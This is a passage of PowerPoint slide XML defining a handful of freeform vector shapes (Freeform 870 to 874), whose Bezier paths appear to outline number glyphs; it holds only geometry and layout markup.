                    <a:pt x="31" y="215"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="215"/>
                    <a:pt x="63" y="199"/>
                    <a:pt x="63" y="18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29" name="Freeform 870">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0BD2C3F8-5F45-4707-80EC-808423106684}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId46"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4076701" y="1897063"/>
              <a:ext cx="58738" cy="109538"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 103 w 168"/>
                <a:gd name="T1" fmla="*/ 21 h 311"/>
                <a:gd name="T2" fmla="*/ 88 w 168"/>
                <a:gd name="T3" fmla="*/ 0 h 311"/>
                <a:gd name="T4" fmla="*/ 73 w 168"/>
                <a:gd name="T5" fmla="*/ 12 h 311"/>
                <a:gd name="T6" fmla="*/ 19 w 168"/>
                <a:gd name="T7" fmla="*/ 61 h 311"/>
                <a:gd name="T8" fmla="*/ 0 w 168"/>
                <a:gd name="T9" fmla="*/ 77 h 311"/>
                <a:gd name="T10" fmla="*/ 17 w 168"/>
                <a:gd name="T11" fmla="*/ 92 h 311"/>
                <a:gd name="T12" fmla="*/ 69 w 168"/>
                <a:gd name="T13" fmla="*/ 70 h 311"/>
                <a:gd name="T14" fmla="*/ 69 w 168"/>
                <a:gd name="T15" fmla="*/ 280 h 311"/>
                <a:gd name="T16" fmla="*/ 23 w 168"/>
                <a:gd name="T17" fmla="*/ 280 h 311"/>
                <a:gd name="T18" fmla="*/ 3 w 168"/>
                <a:gd name="T19" fmla="*/ 296 h 311"/>
                <a:gd name="T20" fmla="*/ 23 w 168"/>
                <a:gd name="T21" fmla="*/ 311 h 311"/>
                <a:gd name="T22" fmla="*/ 149 w 168"/>
                <a:gd name="T23" fmla="*/ 311 h 311"/>
                <a:gd name="T24" fmla="*/ 168 w 168"/>
                <a:gd name="T25" fmla="*/ 296 h 311"/>
                <a:gd name="T26" fmla="*/ 149 w 168"/>
                <a:gd name="T27" fmla="*/ 280 h 311"/>
                <a:gd name="T28" fmla="*/ 103 w 168"/>
                <a:gd name="T29" fmla="*/ 280 h 311"/>
                <a:gd name="T30" fmla="*/ 103 w 168"/>
                <a:gd name="T31" fmla="*/ 2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8" h="311">
                  <a:moveTo>
                    <a:pt x="103" y="21"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="103" y="13"/>
                    <a:pt x="103" y="0"/>
                    <a:pt x="88" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="79" y="0"/>
                    <a:pt x="76" y="6"/>
                    <a:pt x="73" y="12"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="54" y="55"/>
                    <a:pt x="28" y="60"/>
                    <a:pt x="19" y="61"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="62"/>
                    <a:pt x="0" y="63"/>
                    <a:pt x="0" y="77"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="89"/>
                    <a:pt x="9" y="92"/>
                    <a:pt x="17" y="92"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="92"/>
                    <a:pt x="47" y="89"/>
                    <a:pt x="69" y="70"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="69" y="280"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23" y="280"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="280"/>
                    <a:pt x="3" y="280"/>
                    <a:pt x="3" y="296"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="311"/>
                    <a:pt x="16" y="311"/>
                    <a:pt x="23" y="311"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="149" y="311"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="156" y="311"/>
                    <a:pt x="168" y="311"/>
                    <a:pt x="168" y="296"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="168" y="280"/>
                    <a:pt x="157" y="280"/>
                    <a:pt x="149" y="280"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="103" y="280"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103" y="2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30" name="Freeform 871">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A09B04FD-5825-4FAF-9964-050CB3075B0B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId47"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4157663" y="1898651"/>
              <a:ext cx="73025" cy="109538"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 112 w 209"/>
                <a:gd name="T1" fmla="*/ 111 h 310"/>
                <a:gd name="T2" fmla="*/ 52 w 209"/>
                <a:gd name="T3" fmla="*/ 125 h 310"/>
                <a:gd name="T4" fmla="*/ 52 w 209"/>
                <a:gd name="T5" fmla="*/ 30 h 310"/>
                <a:gd name="T6" fmla="*/ 172 w 209"/>
                <a:gd name="T7" fmla="*/ 30 h 310"/>
                <a:gd name="T8" fmla="*/ 192 w 209"/>
                <a:gd name="T9" fmla="*/ 15 h 310"/>
                <a:gd name="T10" fmla="*/ 172 w 209"/>
                <a:gd name="T11" fmla="*/ 0 h 310"/>
                <a:gd name="T12" fmla="*/ 37 w 209"/>
                <a:gd name="T13" fmla="*/ 0 h 310"/>
                <a:gd name="T14" fmla="*/ 18 w 209"/>
                <a:gd name="T15" fmla="*/ 20 h 310"/>
                <a:gd name="T16" fmla="*/ 18 w 209"/>
                <a:gd name="T17" fmla="*/ 153 h 310"/>
                <a:gd name="T18" fmla="*/ 33 w 209"/>
                <a:gd name="T19" fmla="*/ 173 h 310"/>
                <a:gd name="T20" fmla="*/ 48 w 209"/>
                <a:gd name="T21" fmla="*/ 166 h 310"/>
                <a:gd name="T22" fmla="*/ 111 w 209"/>
                <a:gd name="T23" fmla="*/ 141 h 310"/>
                <a:gd name="T24" fmla="*/ 175 w 209"/>
                <a:gd name="T25" fmla="*/ 210 h 310"/>
                <a:gd name="T26" fmla="*/ 97 w 209"/>
                <a:gd name="T27" fmla="*/ 280 h 310"/>
                <a:gd name="T28" fmla="*/ 37 w 209"/>
                <a:gd name="T29" fmla="*/ 248 h 310"/>
                <a:gd name="T30" fmla="*/ 44 w 209"/>
                <a:gd name="T31" fmla="*/ 232 h 310"/>
                <a:gd name="T32" fmla="*/ 22 w 209"/>
                <a:gd name="T33" fmla="*/ 210 h 310"/>
                <a:gd name="T34" fmla="*/ 0 w 209"/>
                <a:gd name="T35" fmla="*/ 234 h 310"/>
                <a:gd name="T36" fmla="*/ 97 w 209"/>
                <a:gd name="T37" fmla="*/ 310 h 310"/>
                <a:gd name="T38" fmla="*/ 209 w 209"/>
                <a:gd name="T39" fmla="*/ 210 h 310"/>
                <a:gd name="T40" fmla="*/ 112 w 209"/>
                <a:gd name="T41" fmla="*/ 111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310">
                  <a:moveTo>
                    <a:pt x="112" y="111"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="94" y="111"/>
                    <a:pt x="72" y="114"/>
                    <a:pt x="52" y="125"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="52" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="172" y="30"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="179" y="30"/>
                    <a:pt x="192" y="30"/>
                    <a:pt x="192" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="192" y="0"/>
                    <a:pt x="180" y="0"/>
                    <a:pt x="172" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="37" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="0"/>
                    <a:pt x="18" y="4"/>
                    <a:pt x="18" y="20"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="18" y="153"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="18" y="162"/>
                    <a:pt x="18" y="173"/>
                    <a:pt x="33" y="173"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="42" y="173"/>
                    <a:pt x="44" y="171"/>
                    <a:pt x="48" y="166"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="150"/>
                    <a:pt x="82" y="141"/>
                    <a:pt x="111" y="141"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="152" y="141"/>
                    <a:pt x="175" y="177"/>
                    <a:pt x="175" y="210"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="175" y="250"/>
                    <a:pt x="139" y="280"/>
                    <a:pt x="97" y="280"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="83" y="280"/>
                    <a:pt x="51" y="276"/>
                    <a:pt x="37" y="248"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="40" y="246"/>
                    <a:pt x="44" y="242"/>
                    <a:pt x="44" y="232"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="44" y="218"/>
                    <a:pt x="32" y="210"/>
                    <a:pt x="22" y="210"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14" y="210"/>
                    <a:pt x="0" y="214"/>
                    <a:pt x="0" y="234"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="275"/>
                    <a:pt x="41" y="310"/>
                    <a:pt x="97" y="310"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="160" y="310"/>
                    <a:pt x="209" y="265"/>
                    <a:pt x="209" y="210"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="209" y="159"/>
                    <a:pt x="171" y="111"/>
                    <a:pt x="112" y="11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31" name="Freeform 872">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3DB8EE80-C764-4E44-AD85-4819386D83D7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId48"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4244976" y="1897063"/>
              <a:ext cx="79375" cy="109538"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 4 w 232"/>
                <a:gd name="T1" fmla="*/ 189 h 311"/>
                <a:gd name="T2" fmla="*/ 0 w 232"/>
                <a:gd name="T3" fmla="*/ 206 h 311"/>
                <a:gd name="T4" fmla="*/ 20 w 232"/>
                <a:gd name="T5" fmla="*/ 226 h 311"/>
                <a:gd name="T6" fmla="*/ 145 w 232"/>
                <a:gd name="T7" fmla="*/ 226 h 311"/>
                <a:gd name="T8" fmla="*/ 145 w 232"/>
                <a:gd name="T9" fmla="*/ 280 h 311"/>
                <a:gd name="T10" fmla="*/ 114 w 232"/>
                <a:gd name="T11" fmla="*/ 280 h 311"/>
                <a:gd name="T12" fmla="*/ 94 w 232"/>
                <a:gd name="T13" fmla="*/ 296 h 311"/>
                <a:gd name="T14" fmla="*/ 114 w 232"/>
                <a:gd name="T15" fmla="*/ 311 h 311"/>
                <a:gd name="T16" fmla="*/ 204 w 232"/>
                <a:gd name="T17" fmla="*/ 311 h 311"/>
                <a:gd name="T18" fmla="*/ 224 w 232"/>
                <a:gd name="T19" fmla="*/ 296 h 311"/>
                <a:gd name="T20" fmla="*/ 204 w 232"/>
                <a:gd name="T21" fmla="*/ 280 h 311"/>
                <a:gd name="T22" fmla="*/ 173 w 232"/>
                <a:gd name="T23" fmla="*/ 280 h 311"/>
                <a:gd name="T24" fmla="*/ 173 w 232"/>
                <a:gd name="T25" fmla="*/ 226 h 311"/>
                <a:gd name="T26" fmla="*/ 212 w 232"/>
                <a:gd name="T27" fmla="*/ 226 h 311"/>
                <a:gd name="T28" fmla="*/ 232 w 232"/>
                <a:gd name="T29" fmla="*/ 211 h 311"/>
                <a:gd name="T30" fmla="*/ 212 w 232"/>
                <a:gd name="T31" fmla="*/ 196 h 311"/>
                <a:gd name="T32" fmla="*/ 173 w 232"/>
                <a:gd name="T33" fmla="*/ 196 h 311"/>
                <a:gd name="T34" fmla="*/ 173 w 232"/>
                <a:gd name="T35" fmla="*/ 20 h 311"/>
                <a:gd name="T36" fmla="*/ 153 w 232"/>
                <a:gd name="T37" fmla="*/ 0 h 311"/>
                <a:gd name="T38" fmla="*/ 139 w 232"/>
                <a:gd name="T39" fmla="*/ 0 h 311"/>
                <a:gd name="T40" fmla="*/ 118 w 232"/>
                <a:gd name="T41" fmla="*/ 10 h 311"/>
                <a:gd name="T42" fmla="*/ 4 w 232"/>
                <a:gd name="T43" fmla="*/ 189 h 311"/>
                <a:gd name="T44" fmla="*/ 34 w 232"/>
                <a:gd name="T45" fmla="*/ 196 h 311"/>
                <a:gd name="T46" fmla="*/ 145 w 232"/>
                <a:gd name="T47" fmla="*/ 22 h 311"/>
                <a:gd name="T48" fmla="*/ 145 w 232"/>
                <a:gd name="T49" fmla="*/ 196 h 311"/>
                <a:gd name="T50" fmla="*/ 34 w 232"/>
                <a:gd name="T51" fmla="*/ 19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2" h="311">
                  <a:moveTo>
                    <a:pt x="4" y="189"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="195"/>
                    <a:pt x="0" y="196"/>
                    <a:pt x="0" y="206"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="223"/>
                    <a:pt x="4" y="226"/>
                    <a:pt x="20" y="226"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="145" y="226"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145" y="280"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="114" y="280"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="280"/>
                    <a:pt x="94" y="280"/>
                    <a:pt x="94" y="296"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="94" y="311"/>
                    <a:pt x="107" y="311"/>
                    <a:pt x="114" y="311"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="204" y="311"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="211" y="311"/>
                    <a:pt x="224" y="311"/>
                    <a:pt x="224" y="296"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="224" y="280"/>
                    <a:pt x="212" y="280"/>
                    <a:pt x="204" y="280"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="173" y="280"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="173" y="226"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="212" y="226"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="219" y="226"/>
                    <a:pt x="232" y="226"/>
                    <a:pt x="232" y="211"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="232" y="196"/>
                    <a:pt x="220" y="196"/>
                    <a:pt x="212" y="196"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="173" y="196"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="173" y="20"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="173" y="4"/>
                    <a:pt x="170" y="0"/>
                    <a:pt x="153" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="139" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="127" y="0"/>
                    <a:pt x="124" y="0"/>
                    <a:pt x="118" y="10"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="4" y="189"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="34" y="196"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="145" y="22"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145" y="196"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34" y="196"/>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32" name="Freeform 873">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF50C17E-21AB-4E81-9185-CFA12E649D09}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId49"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4337051" y="1897063"/>
              <a:ext cx="76200" cy="111125"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 161 w 217"/>
                <a:gd name="T1" fmla="*/ 144 h 316"/>
                <a:gd name="T2" fmla="*/ 203 w 217"/>
                <a:gd name="T3" fmla="*/ 71 h 316"/>
                <a:gd name="T4" fmla="*/ 109 w 217"/>
                <a:gd name="T5" fmla="*/ 0 h 316"/>
                <a:gd name="T6" fmla="*/ 14 w 217"/>
                <a:gd name="T7" fmla="*/ 59 h 316"/>
                <a:gd name="T8" fmla="*/ 36 w 217"/>
                <a:gd name="T9" fmla="*/ 82 h 316"/>
                <a:gd name="T10" fmla="*/ 58 w 217"/>
                <a:gd name="T11" fmla="*/ 60 h 316"/>
                <a:gd name="T12" fmla="*/ 54 w 217"/>
                <a:gd name="T13" fmla="*/ 46 h 316"/>
                <a:gd name="T14" fmla="*/ 109 w 217"/>
                <a:gd name="T15" fmla="*/ 31 h 316"/>
                <a:gd name="T16" fmla="*/ 168 w 217"/>
                <a:gd name="T17" fmla="*/ 71 h 316"/>
                <a:gd name="T18" fmla="*/ 147 w 217"/>
                <a:gd name="T19" fmla="*/ 115 h 316"/>
                <a:gd name="T20" fmla="*/ 101 w 217"/>
                <a:gd name="T21" fmla="*/ 130 h 316"/>
                <a:gd name="T22" fmla="*/ 65 w 217"/>
                <a:gd name="T23" fmla="*/ 146 h 316"/>
                <a:gd name="T24" fmla="*/ 85 w 217"/>
                <a:gd name="T25" fmla="*/ 161 h 316"/>
                <a:gd name="T26" fmla="*/ 108 w 217"/>
                <a:gd name="T27" fmla="*/ 161 h 316"/>
                <a:gd name="T28" fmla="*/ 183 w 217"/>
                <a:gd name="T29" fmla="*/ 224 h 316"/>
                <a:gd name="T30" fmla="*/ 109 w 217"/>
                <a:gd name="T31" fmla="*/ 286 h 316"/>
                <a:gd name="T32" fmla="*/ 38 w 217"/>
                <a:gd name="T33" fmla="*/ 257 h 316"/>
                <a:gd name="T34" fmla="*/ 44 w 217"/>
                <a:gd name="T35" fmla="*/ 241 h 316"/>
                <a:gd name="T36" fmla="*/ 22 w 217"/>
                <a:gd name="T37" fmla="*/ 219 h 316"/>
                <a:gd name="T38" fmla="*/ 0 w 217"/>
                <a:gd name="T39" fmla="*/ 243 h 316"/>
                <a:gd name="T40" fmla="*/ 109 w 217"/>
                <a:gd name="T41" fmla="*/ 316 h 316"/>
                <a:gd name="T42" fmla="*/ 217 w 217"/>
                <a:gd name="T43" fmla="*/ 224 h 316"/>
                <a:gd name="T44" fmla="*/ 161 w 217"/>
                <a:gd name="T45" fmla="*/ 14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7" h="316">
                  <a:moveTo>
                    <a:pt x="161" y="144"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="189" y="126"/>
                    <a:pt x="203" y="98"/>
                    <a:pt x="203" y="71"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="203" y="34"/>
                    <a:pt x="166" y="0"/>
                    <a:pt x="109" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="49" y="0"/>
                    <a:pt x="14" y="24"/>
                    <a:pt x="14" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14" y="75"/>
                    <a:pt x="27" y="82"/>
                    <a:pt x="36" y="82"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="47" y="82"/>
                    <a:pt x="58" y="74"/>
                    <a:pt x="58" y="60"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="53"/>
                    <a:pt x="55" y="48"/>
                    <a:pt x="54" y="46"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="69" y="31"/>
                    <a:pt x="105" y="31"/>
                    <a:pt x="109" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="143" y="31"/>
                    <a:pt x="168" y="49"/>
                    <a:pt x="168" y="71"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="168" y="86"/>
                    <a:pt x="161" y="104"/>
                    <a:pt x="147" y="115"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="131" y="128"/>
                    <a:pt x="119" y="129"/>
                    <a:pt x="101" y="130"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="132"/>
                    <a:pt x="65" y="132"/>
                    <a:pt x="65" y="146"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="161"/>
                    <a:pt x="77" y="161"/>
                    <a:pt x="85" y="161"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="108" y="161"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="157" y="161"/>
                    <a:pt x="183" y="195"/>
                    <a:pt x="183" y="224"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="183" y="254"/>
                    <a:pt x="155" y="286"/>
                    <a:pt x="109" y="286"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="89" y="286"/>
                    <a:pt x="51" y="280"/>
                    <a:pt x="38" y="257"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="40" y="254"/>
                    <a:pt x="44" y="251"/>
                    <a:pt x="44" y="241"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="44" y="229"/>
                    <a:pt x="34" y="219"/>
                    <a:pt x="22" y="219"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="219"/>
                    <a:pt x="0" y="227"/>
                    <a:pt x="0" y="243"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="287"/>
                    <a:pt x="48" y="316"/>
                    <a:pt x="109" y="316"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="175" y="316"/>
                    <a:pt x="217" y="270"/>
                    <a:pt x="217" y="224"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="217" y="188"/>
                    <a:pt x="194" y="159"/>
                    <a:pt x="161" y="14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33" name="Freeform 874">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A6FE8080-385A-4C0B-8228-237580AC4D95}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId50"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4429126" y="1897063"/>
              <a:ext cx="71438" cy="111125"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 35 w 208"/>
                <a:gd name="T1" fmla="*/ 142 h 316"/>
                <a:gd name="T2" fmla="*/ 133 w 208"/>
                <a:gd name="T3" fmla="*/ 31 h 316"/>
                <a:gd name="T4" fmla="*/ 160 w 208"/>
                <a:gd name="T5" fmla="*/ 39 h 316"/>
                <a:gd name="T6" fmla="*/ 155 w 208"/>
                <a:gd name="T7" fmla="*/ 53 h 316"/>
                <a:gd name="T8" fmla="*/ 177 w 208"/>
                <a:gd name="T9" fmla="*/ 75 h 316"/>
                <a:gd name="T10" fmla="*/ 200 w 208"/>
                <a:gd name="T11" fmla="*/ 52 h 316"/>
                <a:gd name="T12" fmla="*/ 133 w 208"/>
                <a:gd name="T13" fmla="*/ 0 h 316"/>
                <a:gd name="T14" fmla="*/ 0 w 208"/>
                <a:gd name="T15" fmla="*/ 161 h 316"/>
                <a:gd name="T16" fmla="*/ 105 w 208"/>
                <a:gd name="T17" fmla="*/ 316 h 316"/>
                <a:gd name="T18" fmla="*/ 208 w 208"/>
                <a:gd name="T19" fmla="*/ 214 h 316"/>
                <a:gd name="T20" fmla="*/ 109 w 208"/>
                <a:gd name="T21" fmla="*/ 113 h 316"/>
                <a:gd name="T22" fmla="*/ 35 w 208"/>
                <a:gd name="T23" fmla="*/ 142 h 316"/>
                <a:gd name="T24" fmla="*/ 105 w 208"/>
                <a:gd name="T25" fmla="*/ 286 h 316"/>
                <a:gd name="T26" fmla="*/ 43 w 208"/>
                <a:gd name="T27" fmla="*/ 231 h 316"/>
                <a:gd name="T28" fmla="*/ 40 w 208"/>
                <a:gd name="T29" fmla="*/ 222 h 316"/>
                <a:gd name="T30" fmla="*/ 40 w 208"/>
                <a:gd name="T31" fmla="*/ 220 h 316"/>
                <a:gd name="T32" fmla="*/ 40 w 208"/>
                <a:gd name="T33" fmla="*/ 215 h 316"/>
                <a:gd name="T34" fmla="*/ 39 w 208"/>
                <a:gd name="T35" fmla="*/ 200 h 316"/>
                <a:gd name="T36" fmla="*/ 107 w 208"/>
                <a:gd name="T37" fmla="*/ 144 h 316"/>
                <a:gd name="T38" fmla="*/ 174 w 208"/>
                <a:gd name="T39" fmla="*/ 214 h 316"/>
                <a:gd name="T40" fmla="*/ 105 w 208"/>
                <a:gd name="T41" fmla="*/ 28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8" h="316">
                  <a:moveTo>
                    <a:pt x="35" y="142"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="42" y="72"/>
                    <a:pt x="89" y="31"/>
                    <a:pt x="133" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="150" y="31"/>
                    <a:pt x="158" y="36"/>
                    <a:pt x="160" y="39"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="158" y="41"/>
                    <a:pt x="155" y="44"/>
                    <a:pt x="155" y="53"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="155" y="65"/>
                    <a:pt x="164" y="75"/>
                    <a:pt x="177" y="75"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="190" y="75"/>
                    <a:pt x="200" y="67"/>
                    <a:pt x="200" y="52"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="200" y="27"/>
                    <a:pt x="182" y="0"/>
                    <a:pt x="133" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="0"/>
                    <a:pt x="0" y="61"/>
                    <a:pt x="0" y="161"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="280"/>
                    <a:pt x="55" y="316"/>
                    <a:pt x="105" y="316"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="159" y="316"/>
                    <a:pt x="208" y="274"/>
                    <a:pt x="208" y="214"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="208" y="157"/>
                    <a:pt x="164" y="113"/>
                    <a:pt x="109" y="113"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="83" y="113"/>
                    <a:pt x="57" y="122"/>
                    <a:pt x="35" y="142"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="105" y="286"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="286"/>
                    <a:pt x="53" y="261"/>
                    <a:pt x="43" y="231"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="42" y="228"/>
                    <a:pt x="41" y="225"/>
                    <a:pt x="40" y="222"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="40" y="220"/>
                  </a:lnTo>
                  <a:lnTo>
